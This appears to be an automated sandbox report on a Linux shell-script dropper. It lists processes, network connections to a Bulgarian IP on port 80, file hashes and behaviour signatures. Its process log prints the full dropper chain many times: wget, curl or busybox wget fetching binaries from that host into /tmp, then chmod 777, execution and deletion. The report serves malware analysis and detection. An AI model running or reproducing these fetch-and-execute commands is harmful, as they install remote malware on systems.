[/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/chmod

[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/rm

[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/wget

[wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/chmod

[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT

[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/rm

[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/wget

[wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/chmod

[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz

[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/rm

[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/chmod

[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319

[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/rm

[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 03:02

Reported

2024-10-18 03:05

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

24s

Max time network

128s

Command Line

[/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E N/A
N/A /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT N/A
N/A /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz N/A
N/A /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 N/A
N/A /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe N/A
N/A /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 N/A
N/A /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu N/A
N/A /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g N/A
N/A /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq N/A
N/A /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 N/A
N/A /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ N/A
N/A /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 N/A
N/A /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 N/A
N/A /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 N/A
N/A /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq N/A
N/A /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 N/A
N/A /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu N/A
N/A /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g N/A
N/A /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 N/A
N/A /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ N/A
N/A /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 N/A
N/A /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 N/A
N/A /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 N/A
N/A /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe N/A
N/A /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E N/A
N/A /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT N/A
N/A /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz N/A
N/A /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /usr/bin/curl N/A
File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /usr/bin/curl N/A
File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /usr/bin/curl N/A
File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /usr/bin/curl N/A
File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /usr/bin/curl N/A
File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /usr/bin/curl N/A
File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /usr/bin/curl N/A
File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /usr/bin/curl N/A
File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /usr/bin/curl N/A
File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /usr/bin/curl N/A
File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /usr/bin/curl N/A
File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /usr/bin/curl N/A
File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /usr/bin/curl N/A
File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /usr/bin/curl N/A
File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /usr/bin/curl N/A
File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /usr/bin/curl N/A
File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /usr/bin/curl N/A
File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /usr/bin/curl N/A
File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /usr/bin/curl N/A
File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /usr/bin/curl N/A
File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /usr/bin/curl N/A
File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /usr/bin/curl N/A
File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /usr/bin/curl N/A
File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /usr/bin/curl N/A
File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /usr/bin/curl N/A
File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /usr/bin/curl N/A
File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /usr/bin/curl N/A
File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /usr/bin/curl N/A

Processes

/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh

[/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/chmod

[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/rm

[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/wget

[wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/chmod

[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT

[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/rm

[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/wget

[wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/chmod

[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz

[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/rm

[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/chmod

[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319

[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/rm

[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/wget

[wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/chmod

[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/rm

[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/wget

[wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/chmod

[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94

[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/rm

[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/wget

[wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/chmod

[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu

[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/rm

[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/wget

[wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/chmod

[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g

[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/rm

[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/wget

[wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/chmod

[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq

[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/rm

[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/wget

[wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/chmod

[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12

[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/rm

[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/wget

[wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/chmod

[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ

[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/rm

[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/chmod

[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3

[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/rm

[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/wget

[wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/chmod

[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0

[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/rm

[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/chmod

[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6

[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/rm

[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/wget

[wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/chmod

[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq

[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/rm

[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/wget

[wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/chmod

[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94

[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/rm

[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/wget

[wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/chmod

[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu

[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/rm

[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/wget

[wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/chmod

[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g

[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/rm

[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/wget

[wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/chmod

[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12

